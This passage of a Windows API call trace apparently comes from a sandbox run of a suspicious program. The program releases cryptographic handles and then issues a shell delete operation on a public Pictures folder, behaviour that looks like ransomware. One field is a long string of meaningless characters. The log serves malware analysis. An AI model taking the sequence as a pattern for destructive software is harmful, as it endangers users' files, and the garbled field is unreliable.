lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.695] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.695] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.695] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.695] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.695] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.696] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.696] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.696] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.696] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.696] WriteFile (in: hFile=0x468, lpBuffer=0x2a71c28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71c28*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0223.697] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.697] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.698] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0223.698] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.698] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0223.698] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.698] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.698] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.698] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.698] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.698] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.698] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab800, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.699] CryptDestroyKey (hKey=0x9e2078) returned 1 [0223.699] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.699] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.699] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.699] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.699] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.699] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.699] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.699] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.699] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.699] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.699] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.699] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.699] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.699] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.699] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.699] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.699] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.699] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.699] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.700] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.700] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.700] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.700] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.700] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.700] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.700] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.700] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.700] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.700] CryptReleaseContext (hProv=0xa7c7f8, dwFlags=0x0) returned 1 [0223.700] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.700] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.700] FreeLibrary (hLibModule=0x76390000) returned 1 [0223.700] CloseHandle (hObject=0x468) returned 1 [0223.701] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x8cedf4*="My Pictures") returned 0x25 [0223.701] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures")) returned 0x2416 [0223.701] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x0, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="", cAlternateFileName="Ƙʦ桰ʪ")) returned 0xffffffff [0223.701] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0223.701] GetLastError () returned 0x6 [0223.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0223.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0223.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x29f7878 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0223.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0223.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0223.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb4d0 [0223.703] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x8cf650*="My Pictures") returned 0x25 [0223.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb4d0 | out: hHeap=0x2af0000) returned 1 [0223.703] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures")) returned 0x2416 [0223.703] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 